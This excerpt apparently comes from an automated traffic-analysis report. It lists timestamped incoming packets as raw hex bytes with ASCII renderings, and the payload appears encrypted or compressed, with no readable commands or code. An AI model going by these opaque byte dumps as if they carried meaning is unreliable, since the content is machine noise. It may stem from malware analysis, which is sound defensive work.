2021-10-13 11:06:38 UTC	24	IN	Data Raw: a1 8c 76 eb 52 74 ec 86 58 5c 25 ae 19 6d 81 eb 40 68 ab 07 bd 8e c7 55 7c 4d 58 83 da d7 e9 34 6e c3 cf 59 7c 80 ff 90 28 c9 bb 39 47 2f b2 47 7b ff 7d 4d 7b f9 9e e4 db c2 df 74 7e 49 06 77 1e 2d 3e cd ec e2 03 8f 01 d8 fe aa a3 b8 b3 aa c8 70 72 05 b3 0e c9 2c f6 c5 2f 69 b8 f4 85 13 b4 23 d9 2f e0 fb 35 42 db 6d 56 61 cb 31 8c de 9a c0 51 cb 86 cb d7 48 26 8f 8f 48 ca f2 60 52 62 31 e2 ea 5a 2b ca 45 60 50 8e e0 fd ef ee 65 79 76 bd 07 16 90 74 4f 9a bc f0 fc 2d cd ed 90 53 c9 03 ab 21 45 84 dc 88 18 2e 68 0d bf 2a 3e 20 79 66 7c 74 ce 8e 31 1e 21 7b 81 ed af 6a 98 39 5f 94 c6 96 63 96 c9 53 45 e1 87 99 0f 0f 24 b5 b8 52 41 db 84 43 30 c8 a2 f3 96 a0 88 e1 cb d3 62 9b 49 bd 75 07 2f 84 b4 1a b4 89 ad 57 fd 9f 66 7b 2a a8 a0 2d 22 74 6f 99 5d 0e 9e 41 Data Ascii: vRtX\%m@hU\|MX4nY\|(9G/G{}M{t~Iw->pr,/i#/5BmVa1QH&H`Rb1Z+E`PeyvtO-S!E.h> yf\|t1!{j9_cSE$RAC0bIu/Wf{-"to]A
2021-10-13 11:06:38 UTC	25	IN	Data Raw: f3 46 e4 05 ce 40 9c 47 68 14 a4 82 24 bf d6 9e c9 72 42 33 a6 38 5f e3 e0 25 fa b6 82 96 94 2e e2 08 83 ec 65 e7 a5 aa 82 1f 71 f6 d5 d1 cb 84 b9 30 5f dc 0b 7b 4f ff 82 e1 e3 fe c0 d5 0a 4e ae 5e c4 81 ba 30 4c 25 2c 36 b4 8d 20 00 53 0d 37 2f aa 18 86 db b4 30 c3 35 0d ce e2 b5 db 96 50 ab b9 c0 fc 51 89 e7 f8 7f 2b a3 27 ef 3f f8 d9 06 a9 35 4a 4a 92 36 0a 9b 07 19 68 86 f0 35 46 4e 8a 3c 89 78 2b a2 37 37 a3 03 6e 39 b7 87 a8 9b 01 87 99 a3 85 31 61 ae bc 93 53 fb 44 24 8f 2f 2b e4 60 ce 6e bf b1 11 d9 9d 5b 81 03 f2 3b c2 2a fa 61 3a 0e 7f 38 d4 99 17 97 ca d8 68 7c b2 a9 bb 48 da 05 b2 72 30 17 df 79 2a a0 19 c1 68 d6 e5 64 4c 36 4a b0 47 cd 0f d3 8d 77 de 27 16 71 50 d4 d9 62 c2 1f 85 86 87 57 11 24 f3 bc 7f a7 81 a3 48 6b f2 a2 07 70 f8 6a a8 19 Data Ascii: F@Gh$rB38_%.eq0_{ON^0L%,6 S7/05PQ+'?5JJ6h5FN<x+77n91aSD$/+`n[;a:8h\|Hr0yhdL6JGw'qPbW$Hkpj
2021-10-13 11:06:38 UTC	27	IN	Data Raw: 5c 1c 65 cc 62 6f 65 de de 8e 5b 74 84 47 7b b4 90 b3 db 7f 32 55 37 73 2b c6 a5 62 57 88 06 4d cc db 71 5e f8 c7 9c 9f bf 79 35 3f 96 a3 2a 0b e2 e7 f4 13 d9 d4 49 e7 af 60 6d 8a b0 9b 43 34 f4 1f 1b a7 60 3a 52 c8 29 f7 be 1f 98 bc 8d 76 e5 9c 9a ff 89 42 88 29 d9 3b 71 e8 39 57 be 22 04 b1 8d c6 40 50 6b 49 8c c1 53 f7 25 6b ef 05 95 7e 8a fc 83 3b df 94 21 39 2d 8b 6b 7e d7 70 46 5b f1 36 c0 db 82 4a f4 76 49 05 62 cf ed 21 cc ec ea 73 eb 33 c1 8a 8a f1 b8 b7 84 d5 67 63 17 8a 3a c1 04 ac 45 27 6f ab e2 5f ee 95 23 d9 2d ff 80 06 7b e5 3e 75 61 cf 19 83 dd 9a 36 46 b6 ae 5a dd c8 24 38 98 9a 9a aa 62 52 63 20 ee db 7b 23 a7 4a 0c 73 8a c8 a7 ed ee 63 71 12 e6 2f 03 11 7c 45 b2 98 2c a9 25 c9 c5 af 54 c9 05 c2 57 4d 85 d6 ae 65 34 6d 1c a6 04 22 08 28 Data Ascii: \eboe[tG{2U7s+bWMq^y5?*I`mC4`:R)vB);q9W"@PkIS%k~;!9-k~pF[6JvIb!s3gc:E'o_#-{>ua6FZ$8bRc {#Jscq/\|E,%TWMe4m"(
2021-10-13 11:06:38 UTC	28	IN	Data Raw: f0 c9 01 cb bf 98 b6 08 4b ca e9 c5 51 9e 90 19 23 d3 df 83 f8 96 14 ef 42 20 b0 6d a7 ef 24 7a 83 d2 7e 38 b3 9d eb cf af a7 a9 b4 ff 25 60 9b e6 aa 75 f0 93 17 ba 38 51 7c d5 2b b2 c5 ac 6d 29 ef 25 58 bf 00 6a cf 38 c2 50 ef cf fa 9b e0 18 5d 51 8f 5c 69 a7 ae 96 25 4d c6 be d3 64 4b b5 a1 29 5e e2 f9 3b e7 a4 87 92 13 3f fe 04 8a 6e 8a eb 9e 8c 27 0e 7a d4 e6 c1 c6 98 3a 12 5f d2 14 76 d5 c6 88 fe c7 0a 11 eb 1e 66 a6 77 d0 8b b8 2b 6f 00 29 59 aa f8 32 0a 5e 09 01 3b a0 1f 86 c7 25 bb 25 ee 37 5e 97 81 d5 f9 72 ba b1 d7 eb 78 b2 e6 fb 6e 36 ab 86 16 3e d4 cd 3d b6 25 46 56 81 22 29 9b 1f 76 76 25 e1 33 46 52 84 1a 8e 77 3c 3e 03 28 b5 fc 7c 18 a8 88 af 87 b5 87 95 8b 2c 22 73 bb ba 8d 5e 6b 79 34 81 3c c3 7f 64 d1 6c ae b0 2a cd e8 49 8b 10 fa 29 05 Data Ascii: KQ#B m$z~8%`u8Q\|+m)%Xj8P]Q\i%MdK)^;?n'z:_vfw+o)Y2^;%%7^rxn6>=%FV")vv%3FRw<>(\|,"s^ky4<dl*I)
2021-10-13 11:06:38 UTC	29	IN	Data Raw: 54 0e b1 29 26 b8 cf c4 4c 3d 7d cd e3 15 0d 36 3d 55 98 90 cd 10 b8 4b 5b a2 b4 4d 35 90 b1 79 f5 22 82 ba ee 18 f0 9f f2 f4 94 eb c2 8f 07 78 13 05 09 cf bb cd 8b 9e 2b 90 ec dc de f8 ef 84 ef 94 1c 0f e5 6f 90 fb 53 bb 64 ea 9b 68 12 f3 52 46 6d 74 d0 e5 ba 4b 51 91 7c 64 84 89 b6 8a 59 f3 82 24 76 5a f2 ab 4a 48 9a 20 56 e6 db 5f 2b 0c d5 93 97 bd 51 0c 0d bf b1 21 06 f9 c0 b9 c7 ca dd 63 d8 a2 48 7e e4 c8 91 50 33 f6 38 06 a7 6b fd ac b4 1c f4 af 1a 6e a5 9d 50 c3 88 8e c8 e9 0f 5e 3a dc f6 73 f5 3d 59 6f a5 f1 a4 8a cd 8d 45 4c 70 b4 d0 57 eb 27 47 ef 2a 94 7e 8a 21 92 30 9a 8e 0a 78 5b b2 47 7d d7 70 4e cf ff b6 c0 fa c2 d5 f4 a3 49 06 73 d2 82 3c cd ec e0 1c f5 30 c1 80 a2 54 b8 b7 82 e7 73 72 03 83 2b c9 2c ed 45 27 69 b8 f0 58 82 b4 23 d9 2d f8 Data Ascii: T)&L=}6=UK[M5y"x+oSdhRFmtKQ\|dY$vZJH V_+Q!cH~P38knP^:s=YoELpW'G*~!0x[G}pNIs<0Tsr+,E'iX#-
2021-10-13 11:06:38 UTC	31	IN	Data Raw: e2 8d f0 14 1a 6f bb c5 81 cd 82 b4 0b a2 0b cc a8 5c 0b d1 4e 1a ba 56 1b 53 56 fa f4 e4 c0 28 6d 50 79 7f c5 1d 57 f3 8c 36 f8 9a 3a 70 fe d3 21 64 d0 a6 c2 b4 65 44 54 d7 01 ec 35 4e 11 44 53 62 82 99 a0 f1 b8 0a 70 c6 3d 5e 01 d9 64 29 da bc 94 b7 30 4b ca e9 f9 f1 8a b8 b0 34 5f ea 9b 74 a8 3c 5b 43 08 89 44 fd e5 33 fc ab 04 f3 12 9b 29 ea dc a1 90 e0 a7 f0 2f 66 42 74 92 8b f1 ab 9f bd 29 57 7c 2d b3 b1 c5 ab 5d b0 e8 25 52 96 0f 62 de 35 cf cc ef 6d eb 91 e4 05 c0 65 99 5b 40 14 bf 9d 3c e3 c6 b9 d0 6f 6f b4 b1 29 5e e2 48 27 fd b1 80 81 a7 3f f3 13 96 50 8a ed 90 b2 0c 31 7a de c1 72 da 85 b0 2f 44 d0 15 71 42 fa b1 7f c5 00 c7 ef 93 61 bd 5f c5 9f ac 35 6f 97 28 59 aa a4 31 0a 5e 18 b0 2d ba 0b 9d d1 a1 18 29 2f ac ed e4 a4 d5 ea 74 b8 b5 d0 f4 Data Ascii: o\NVSV(mPyW6:p!deDT5NDSbp=^d)0K4_t<[CD3)/fBt)W\|-]%Rb5me[@<oo)^H'?P1zr/DqBa_5o(Y1^-)/t
2021-10-13 11:06:38 UTC	32	IN	Data Raw: cd 9b 86 67 94 c6 82 da b0 45 23 f6 73 f4 45 53 04 fc 9b 71 8a db 83 43 0e 34 f9 2a 1b cf 28 7f 14 38 d6 eb 45 04 48 9f 7a 3d 7a 5e 3e a2 b9 b9 bb bc 69 df af 6c 5e 95 97 dc 8e 70 90 b7 90 fb 5d 43 7b 61 1e 21 b9 09 86 33 f3 d0 b8 b2 1e be 3d 20 9c d8 cd 54 c9 6d e4 f8 7a 1e 20 22 49 c3 cc cd 10 b8 51 60 bf 90 2a 04 6f b0 5f e6 17 9f 99 89 29 0f 9e d4 e7 9d fe 86 69 01 7a 76 58 2a d6 de cd 8a 9e 21 92 fe b1 f5 ac ef 8e fe d4 0a 1e f0 f7 2b bf 32 ba 6c f8 76 4c 21 bf dd 7f 6c 5c 9c f7 9b 50 59 93 4d 79 a5 97 be 34 70 c8 81 3c 70 29 df b3 b4 43 a5 02 5e ea d0 72 44 26 ce 6d 9c 82 7b 1a 45 d9 a2 20 0c eb db f6 d2 e0 c0 47 f6 a8 5e 86 8a 9c 93 47 35 e5 18 1a 48 6c c0 86 f0 24 de 1e 0a 9a a9 8c 76 f4 bf 9d ee b0 58 5e 3a d6 2a 74 ff e1 6d 69 85 2d de 74 c7 53 Data Ascii: gE#sESqC4(8EHz=z^>il^p]C{a!3= Tmz "IQ`o_)izvX!+2lvL!l\PYMy4p<p)C^rD&m{E G^G5Hl$vX^:tmi-tS
2021-10-13 11:06:38 UTC	33	IN	Data Raw: 61 13 77 b5 92 3c a7 3c a0 96 31 34 bf 99 66 5c 86 dd 7e 79 1c 3e 45 18 57 3b 34 16 0c 90 d7 bf 52 b6 c0 dc 69 07 6c a2 f9 9f 57 07 40 2d 08 38 db 00 bf f9 78 2f 84 b5 05 f8 d3 85 cc 92 98 6d cf bc 89 b9 a0 95 65 da 01 7d 0e 95 6d f1 d9 5b 99 00 4a bb d4 8e c1 bb 4f 0a 07 28 dd a3 0c 91 f9 4e 32 2d 5c cb 4b 54 95 77 cc d4 22 60 53 df fc e4 e2 5d 87 9e 07 f3 a9 08 74 e1 df 41 3c d1 b7 c7 d0 b3 d2 78 da 1a e3 42 46 28 91 a4 91 75 08 1e c2 48 0a 61 c9 13 47 d7 f9 4b 03 cd ca d9 3a 0f 41 b0 f1 d8 cb 3d 6e b2 ad 64 03 8c ae be c2 62 68 08 83 6d ad e3 25 e1 20 d4 69 30 15 9e 5f 53 ac 99 f5 ac f6 a1 c0 65 7c 80 75 fa 94 1c b4 a7 e0 be f5 bc 06 71 36 7d b2 ee 3c 51 30 a4 b7 d6 bd 63 69 ff 6c eb 9a f1 24 cf 6c a7 4f 58 0c bf ae 37 41 d7 fb c7 70 42 2e 9d 2d 66 c6 Data Ascii: aw<<14f\~y>EW;4RilW@-8x/me}m[JO(N2-\KTw"`S]tA<xBF(uHaGK:A=ndbhm% i0_Se\|uq6}<Q0cil$lOX7ApB.-f
2021-10-13 11:06:38 UTC	34	IN	Data Raw: 25 99 11 c7 53 5e 7a 54 92 d6 50 f7 33 e0 70 7d 3d 7e 80 f5 9a 26 bc 86 25 28 2b dd 19 7e d7 7a 66 24 fe b6 ca c8 c8 fd 63 76 49 0c 62 c9 ed a4 cd ec ea 0f fe 23 c7 91 a9 b5 a9 bc 0c 71 1c db 03 9b 20 d8 38 93 82 27 69 b2 dd f6 5c a0 32 cd 58 c4 80 06 5a 89 69 47 75 ba 22 83 dd 9b a9 2e ef 86 c1 01 d9 28 88 99 4b 99 36 0d fb 62 33 f7 e2 58 31 b4 4b 73 55 9b cd a2 ee e0 67 79 32 bc 07 16 1d 54 d8 9a b8 27 a0 40 55 ed b8 5d da 07 bc 48 5d 81 ca 93 73 ab de 62 1c 02 3a 2a 68 66 17 6b cb 00 8c 1e 82 7a 81 ed 91 cf 98 66 57 a3 f9 6b 62 86 31 7a 28 e0 a7 3b 27 28 24 4b b3 2b 27 da db 4b 03 6a b3 f5 87 59 9f e6 32 5c 8a d8 8a bf f9 72 3e 82 da 08 b8 88 a7 49 81 91 76 73 4f d2 b0 2e 28 61 09 15 54 61 c0 6d f1 8e fc 0a 18 6f c8 81 8e d2 81 59 07 9f 25 b2 f5 44 91 Data Ascii: %S^zTP3p}=~&%(+~zf$cvIb#q 8'i\2XZiGu".(K6b3X1KsUgy2T'@U]H]sb:*hfkzfWkb1z(;'($K+'KjY2\r>IvsO.(aTamoY%D
2021-10-13 11:06:38 UTC	35	IN	Data Raw: e6 94 38 5b 8c 8e 37 f6 a3 98 ea ea 2f f3 19 40 2c 91 ef a5 a2 89 61 2d de c0 da 17 86 ad 51 58 c2 18 6a 65 ee 99 ff db 00 c1 fb 1e 58 bd 45 9c 8b b6 21 47 34 28 5b a0 82 20 50 36 12 18 3c b1 18 97 db 9b 08 3d b3 21 c2 e4 e9 d4 f9 69 bd b2 b5 82 6d 9a f6 f4 1d 52 bd 0b 1b 33 dd c4 26 be 5b 52 41 90 2d 6e 12 1f 76 76 e8 d2 3e 55 53 86 17 e9 45 2a b3 26 3b b0 ec 6a 04 bf ea 9e 91 29 9c 89 a6 97 4d 5a b0 ab 8a 59 fe 4d 50 ba 36 d5 ef 4f e8 0a af ba 33 db 98 4a 8e 7f ca 25 db 33 f2 66 3a 12 71 35 3c 89 3f 17 7f a6 4f 55 a3 a2 b0 9c d3 05 a8 17 47 0d df 62 38 d0 57 3e 69 f0 33 ab 4d 25 b0 a5 45 bd 74 c0 96 7d 13 34 0e 02 b6 d4 f5 7d c0 0c 85 9a 8d 55 02 2f a9 ac 0a d6 80 ad 42 78 fd bd 18 63 ed 6a de 77 d5 9c 86 6e 82 38 98 c6 b6 52 af f6 7a eb 01 ad 05 c1 8d Data Ascii: 8[7/@,a-QXjeXE!G4([ P6<=!imR3&[RA-nvv>USE*&;j)MZYMP6O3J%3f:q5<?OUGb8W>i3M%Et}4}U/Bxcjwn8Rz
2021-10-13 11:06:38 UTC	36	IN	Data Raw: 71 e4 87 a0 13 8b d7 aa 4c 5d 80 15 40 c0 db 79 5b 27 2a 92 b1 a8 5d 74 35 9d b0 27 06 e2 ef f9 3b cb f7 48 ee b3 4f 78 9a b7 8e 5a c7 e4 3c 18 be 4d ed 85 db 26 dd bf 11 b0 a3 a4 06 ee 8f 95 d4 96 a7 a1 c5 c9 21 67 f8 e3 51 6f b4 d1 b0 a1 d2 5b 74 6d 59 83 d0 7f f1 35 6e cd 3a e4 7f 80 f5 be fa ac 9b 27 39 36 b5 51 81 d6 5c 4d 6c ec b1 c0 ca c5 ca fb 88 48 2a 71 e8 87 04 ac 12 1f e3 8b 40 c0 80 a8 8b cd b6 82 cc 70 76 06 b3 bc c9 2c fa 6f 27 69 a3 c0 5d 82 d1 23 d9 2d af 80 06 4a b3 6f 54 7e c2 1b f8 89 9a c6 7d c7 a7 cb dd c2 41 f9 8e 4c 1d 97 f8 7a 15 32 fd c0 65 20 b6 65 18 51 8a c2 8f fd ef 63 5b 44 95 92 1c 10 7a 67 8a b9 2d a3 52 98 ed b8 53 cb 78 f8 4e 4c 81 a2 f0 76 25 63 25 cc 03 3a 2a 55 62 cd 64 c9 99 ed 7b 2d 65 8b d6 15 4a 97 43 75 bc d4 68 Data Ascii: qL]@y[']t5';HOxZ<M&!gQo[tmY5n:'96Q\MlHq@pv,o'i]#-JoT~}ALz2e eQc[Dzg-RSxNLv%c%:*Ubd{-eJCuh
2021-10-13 11:06:38 UTC	38	IN	Data Raw: 38 76 a9 12 91 23 08 83 68 8f 41 31 f6 ba fa c0 39 9b 23 84 f5 a4 8f f9 b2 90 51 76 4d 61 ee 0a f1 92 0e ae 2e 7c 0b ef 35 99 45 ab 75 ae e4 23 50 d1 0e 60 de 39 d9 48 c0 42 eb 90 fd 23 d3 45 c6 55 40 b6 bf 9d 30 52 d3 a3 c3 fe e4 2e bf 13 4f e7 f9 3f e0 ba 99 ae a6 3f fa 02 94 68 88 e0 98 a2 87 26 5e de c0 da d8 8b bb 3b 68 f2 18 60 45 c2 90 ef c2 08 c8 d1 af 66 bd 59 d5 83 af f7 54 3c 39 51 b1 85 ae bd 6c dd 00 3b 99 99 96 c0 a1 21 a9 ea 2f d0 e3 5a c2 ed 78 a9 a2 a9 b4 6c 9a f6 24 44 30 bc 0a 01 3e d4 ce 2e 44 36 37 3b 93 29 01 8a 1f 76 67 b7 f5 3f 63 59 95 11 c9 63 2b a2 04 97 b4 fd 69 1e be 9b c7 f3 29 96 9c 8b a1 20 73 b7 83 ae 4a fb 53 50 57 36 d5 e3 4b bb 62 af ba 3d bc d1 5b 8b 11 eb fa d1 3e cd 67 2c 7a 37 31 2a 92 e7 9f e2 c9 63 55 b3 a8 bb 40 Data Ascii: 8v#hA19#QvMa.\|5Eu#P`9HB#EU@0R.O??h&^;h`EfYT<9Ql;!/Zxl$D0>.D67;)vg?cYc+i) sJSPW6Kb=[>g,z71*cU@
2021-10-13 11:06:38 UTC	39	IN	Data Raw: 87 cc 11 ae 5a 79 b1 90 24 12 f3 d9 73 f2 00 93 99 81 30 f1 99 f8 9f 36 fc b8 bc 06 78 18 07 1b d5 d4 ba 8b 9e 21 d6 ce b3 e4 ef fc 8b c6 d9 0b 1e e1 e1 36 91 60 b7 9a e1 a4 43 04 a2 db e3 da 4b 28 f6 9b 5a 6b 80 47 70 a5 8e ac d1 8f e5 af 2a 7e 01 f8 aa 4a 48 b0 70 47 c0 ca 62 57 2b d4 82 98 b2 88 1c 06 9c a1 08 8c f2 e8 e4 d6 ce c6 58 f3 a0 59 7d 96 4e 90 7c 3c f3 1d 1f a5 68 ec 95 de 3c 0b ae 3c a4 af 8e 5e f1 8c 9f e8 ae 7c 5e 3a dc 45 b8 ff e3 4a 73 bc 2a b1 9c c2 44 aa 68 74 80 c8 44 e4 34 7f c2 0d 9a 80 81 d3 9b 0f 7c 88 20 39 38 bd 54 7a d7 61 4b 63 01 b7 ec d2 b1 69 f4 76 43 0c 6a d0 87 3c dc e9 ff 13 0b 33 ed 8b b4 2e ad b7 82 c7 59 6d 13 88 2f c9 3d f9 5c d9 68 94 e4 5e 80 9e 7c da 2d f9 a8 22 5b a5 6f 39 ad cf 19 89 c7 89 c3 79 fe 83 d4 d7 36 Data Ascii: Zy$s06x!6`CK(ZkGp~JHpGbW+XY}N\|<h<<^\|^:EJsDhtD4\| 98TzaKcivCj<3.Ym/=\h^\|-"[o9y6
2021-10-13 11:06:38 UTC	40	IN	Data Raw: f1 41 0c 26 4d c3 5e 5f ec 73 dd dc 37 67 4c cd 5a cc 02 56 91 02 27 f0 8a 2b 6e e6 cf 2d 67 f8 a0 cc aa 91 47 f6 6d 0f f0 f7 c9 fe 1c 85 9d 7d 87 a5 e0 a8 05 69 df 20 c2 48 c7 47 d9 e3 ae 8f 3b 05 38 5d e9 d1 43 99 be a5 33 5e fe 9b 74 a8 07 ea 4b 86 34 7d a2 6b 84 2c ab 08 69 ef 16 02 eb cf a4 82 fb bc 71 98 68 5d b1 90 70 e6 8d 14 95 3e 56 68 f7 3a a7 cc bc 7d 2a 5f 34 5d 30 a4 bb f6 24 d5 41 e2 45 7c 90 f7 04 c0 68 8c 5b 7c 0c ae 98 59 d9 d6 b2 c1 1f 4b 39 8e 23 4d e7 fb 32 de 35 91 85 85 24 2d 02 b9 da ac e6 89 ae 93 09 6e d4 e8 e8 cb 8e a0 e0 40 c5 32 60 4f ef 89 fe c7 00 c1 af 1e e3 66 5f d5 91 b8 21 46 2f 18 5d a0 b1 20 0a 5e 32 12 3c a0 1a bb c9 a9 63 f4 34 21 c8 f2 97 d6 ed 52 81 2e c6 e3 66 b2 bb f9 6e 3a be 64 89 3e d4 c6 3a ac 1c d8 41 90 2d Data Ascii: A&M^_s7gLZV'+n-gGm}i HG;8]C3^tK4}k,iqh]p>Vh:}*_4]0$AE\|h[\|YK9#M25$-n@2`Of_!F/] ^2<c4!R.fn:d>:A-
2021-10-13 11:06:38 UTC	41	IN	Data Raw: d7 88 e3 f8 bd e5 df fa 09 93 c5 2a 70 76 b8 c9 e6 61 15 5a 9d 63 94 0f 49 e8 f7 aa db 26 83 0f 2a 7c 8d 59 bb 8f 50 a2 40 92 b6 bb d3 c8 42 38 6b 32 3e 7f 4c ad 1c f1 f0 bb 4c 1f 98 2c 3f bb d4 15 06 37 6c ca dd 10 29 20 28 5e b7 91 df 18 cc 28 78 b3 9a 31 1b 87 a3 7b f6 09 bb fa 81 30 f7 13 c7 e5 b6 fd be a0 17 7e 31 4e 2b d6 de f1 a4 99 27 8a 13 23 f1 f9 ef 9f f7 9c 79 88 e0 e1 2d 87 75 ab 6e f2 a1 65 62 b0 df 6b 45 e3 d0 f6 91 4b 5d a6 24 76 a5 99 c6 52 70 e4 89 35 76 3b fe 82 3b 41 89 00 6f 57 cb 7e 4e 3f fd bb ef ad 76 1b 45 0f a2 20 0c e2 e2 fc ec e2 a8 48 f6 a6 60 ef 8a b0 9b 41 10 cd 64 02 b6 6b 83 1c da 26 ff be 1a a2 80 a4 03 ec 8f 99 c6 11 59 5e 30 c7 03 5c 89 e0 40 6e c0 b7 b0 8d cd 42 5e 7b 71 ab a7 54 e1 32 46 50 13 94 74 91 d6 ba 4f b3 88 Data Ascii: pvaZcI&\|YP@B8k2>LL,?7l) (^(x1{0~1N+'#y-unebkEK]$vRp5v;;AoW~N?vE H`Adk&Y^0\@nB^{qT2FPtO
2021-10-13 11:06:38 UTC	43	IN	Data Raw: 62 80 5a 50 1a e3 ac 38 0f 0f 2b 4b b9 44 a5 da db 40 10 6d a2 f3 87 5e 89 f7 1c d7 3d b7 19 ba f9 78 20 84 b5 75 a2 88 ad 5c 81 a8 60 7b 36 83 b0 2e 42 72 00 15 4b 1d 9e 55 f7 87 ef 05 09 71 b1 c9 70 d3 a7 4f 21 90 36 ce a9 44 80 f3 40 0d 44 5d e7 48 6e 0a ed cc d4 37 75 49 5b 4b d5 17 42 99 60 37 d4 86 3d 64 e4 c6 2d 78 da b7 dc a0 8c bb 79 f6 13 f8 3e d4 28 80 a4 82 77 78 a8 ce be 32 a2 cb 22 4c e0 d3 5b 09 cb a8 84 24 1c b5 cb c4 d8 7d 3b ba ba 23 cc c1 88 7e a9 05 e5 5b f6 82 40 be e7 e3 bd bc d2 7c 11 8f 29 eb c5 8d fb f2 b4 f5 07 66 4d 6b 8b 79 e9 81 0e bd 38 5d 77 e0 cc b0 e9 a3 4d da ea 25 58 a1 0d 72 d4 33 c5 4b f7 7d 15 91 db 1f d7 46 2c 5d 68 0f 33 26 36 41 d6 a1 c2 6f 42 2b 84 29 4f e9 f5 3b 08 a8 bd 8c b7 7c f1 13 9c ed 95 f5 83 a4 91 04 64 Data Ascii: bZP8+KD@m^=x u\`{6.BrKUqpO!6D@D]Hn7uI[KB`7=d-xy>(wx2"L[$};#~[@\|)fMky8]wM%Xr3K}F,]h3&6AoB+)O;\|d
2021-10-13 11:06:38 UTC	44	IN	Data Raw: e1 23 ad 78 29 1f db 1b 8b bf 32 35 63 d2 d7 75 47 26 42 a3 4a f8 22 d0 96 77 cf 3c 09 6d db a0 f5 62 f0 0c 84 87 96 65 04 2f 6b ad 10 b3 e3 a3 42 69 e2 a1 32 d8 e3 6a b3 2a 5b 95 86 68 aa 1c 83 f6 b8 5f 27 de c3 eb 4c ab 0e a3 23 5a 8f e9 f2 bb 9e 18 ee 21 3a d6 25 6c 4d a7 f1 ab 6a 06 5e 85 70 09 3e d3 fb f2 ad f7 9b b3 0f 20 5a be 4d 87 a5 dd 9d 40 83 b3 de 76 5c 43 3e 72 19 ee bd 20 85 2b f3 d8 a5 5f 17 ba 07 38 90 d2 18 59 36 6c c8 e4 03 01 4c 21 4d b6 e8 4b 11 b2 5c 54 b6 a8 20 13 91 b1 62 e0 28 18 98 81 3a 9e 11 f9 e5 bc 93 21 a7 06 72 31 a2 2b d6 d2 f4 8f e0 b2 81 ce b9 e6 ff f9 9f f9 ff 82 1f e1 e7 30 4e 6c aa 77 e9 b0 8a 0d b3 df 7c 6a 65 d8 de fa 59 74 88 3b ff a4 9f af d9 7b f5 84 35 75 01 b5 a9 4a 44 e6 8c 46 c0 cc 6d 4f 3f d2 87 63 af 67 1b Data Ascii: #x)25cuG&BJ"w<mbe/kBi2j*[h_'L#Z!:%lMj^p> ZM@v\C>r +_8Y6lL!MK\T b(:!r1+0Nlw\|jeYt;{5uJDFmO?cg
2021-10-13 11:06:38 UTC	45	IN	Data Raw: 28 9c 89 5d 1e 90 6e 7a fb 30 fd cc 06 b8 b5 4d 66 43 80 d9 ae fc e2 4b cb 51 bd 01 73 9a 7d 4f 9c 90 95 a9 2f cb fe b0 46 c1 17 53 4f 5d 8d a2 11 77 25 63 1b 9d 2c 3a 20 73 76 ed 7c af a2 1e 60 2c 56 a0 cf fe 95 99 6c 4c 82 c5 64 4a e3 34 52 1c 8c 2d 3c 0f 09 4b d3 b9 44 b5 cb dc 69 a7 6d a2 f5 85 56 98 f1 1d 5d 3c b7 29 92 ba 69 25 ac 3a 74 b8 82 80 67 83 90 4b 4d 53 a2 b2 2e 24 61 0d 15 50 1f 92 02 d9 86 ef 03 18 6d aa de e1 f6 89 4a 0c 9f 25 cc ab 2b b7 fb 5f 1c ab 51 e3 7e 55 fa e9 a3 fe 2a 6d 5c 57 5a c9 72 4b 86 9e 3c d0 af 2b 77 e7 ca 3a b5 df 92 e5 9d 9b 45 72 c9 1e c8 15 de 28 9b 70 9d 6c 8a be 34 a4 06 70 c5 33 5f c1 24 b6 fc 34 a8 9f 2c d9 58 db f9 c0 54 98 36 0d 1c b5 2b 64 8b af 3e ef 43 08 82 70 a7 e5 33 f6 22 d2 75 90 9b 3b f1 cf a5 8e f3 Data Ascii: (]nz0MfCKQs}O/FSO]w%c,: sv\|`,VlLdJ4R-<KDimV]<)i%:tgKMS.$aPmJ%+_Q~U*m\WZrK<+w:Er(pl4p3_$4,XT6+d>Cp3"u;
2021-10-13 11:06:38 UTC	47	IN	Data Raw: 6e 58 1f 76 76 af 96 3e 55 53 fa 09 9b 63 21 dc 0a 2a b5 fb 69 3d 1e 86 b9 96 46 bc 9a a3 89 24 78 6f be a5 60 cc 55 3f 9a 24 dc 96 6e c2 6c a8 b1 11 f0 9c 5b 81 ce e1 23 f1 38 f1 61 2b 15 60 37 2a 6b c2 99 dd d3 63 54 a2 b3 8b 41 c9 48 ad 78 23 52 df 68 20 cc 88 3f 69 f0 e5 73 39 00 9d a3 48 fa 34 c2 96 71 e7 6f 0a 6d a8 fd ed 75 ea 0a eb 40 8d 55 0a f1 ec 89 38 84 80 a3 48 74 d5 85 1a 63 e9 b4 b9 04 ab ba 87 6e 86 10 94 f4 b2 54 06 a5 79 eb 4a 85 1c d2 99 5c e0 25 f8 bc fb 15 e0 04 18 f2 2a 7a 54 a4 e1 de 6b 06 54 4a 7f 1e 1a 48 f4 f6 bc f3 b3 84 0f 3c 72 93 46 a5 97 dc 9c 40 92 87 ad e7 11 43 36 7b 1e 30 ae 1e 9d 1f f3 84 af 4c 1f cc 3f 38 81 ab 7f 4c 37 66 c2 f3 7a 06 21 22 49 98 90 ce 10 b4 72 20 b0 90 24 3a 89 b3 73 e2 6f 55 99 81 3a 2f 91 dd cd 81 Data Ascii: nXvv>USc!i=F$xo`U?$nl[#8a+`7kcTAHx#Rh ?is9H4qomu@U8HtcnTyJ\%*zTkTJH<rF@C6{0L?8L7fz!"Ir $:soU:/
2021-10-13 11:06:38 UTC	48	IN	Data Raw: 4f b1 26 b2 41 68 0d 63 58 68 f7 8e 4c db c2 d5 e5 70 58 0e 64 ac 0b 3d cd ea f3 15 e4 34 d0 88 b8 cc 31 b6 82 c0 60 79 12 9d 3b c1 35 93 cc 26 69 be e3 52 93 bf 0b 56 2c ff 8a 2b 13 b4 6e 7e ee ce 19 89 f0 a5 d7 73 c7 09 ca dd c2 03 b9 fc 6e 15 81 64 41 6e 22 f1 db 60 5d 9c 4f 60 56 9b c4 b6 e6 81 47 53 52 bb 16 10 01 76 20 bc ba 2d af 3e c1 c5 14 54 c9 05 c2 64 4e 85 da 84 66 29 06 1b b4 02 30 fe 76 45 3b 4a cf 8e 31 62 26 52 b9 e7 b9 9e 47 66 4c 83 c3 be 71 88 26 5a 0b f5 99 56 f0 f0 db 63 14 47 bf dc a8 c5 11 6d a8 fb be 00 8a f7 33 fa a6 b7 23 b5 d1 e4 2f 84 bf 5d 2d 88 ad 57 fd 2d 66 7b 2a ef 37 2f 22 78 17 6b d5 0f 94 67 9e 0d ee 05 03 73 be fc 20 d1 8b 4c 79 0a 29 dd a9 4c 80 fc 77 81 ba 5c c1 69 f9 f9 ef ca fc b3 6d 5a 5b 63 58 1d 5d 8d b6 a3 f8 Data Ascii: 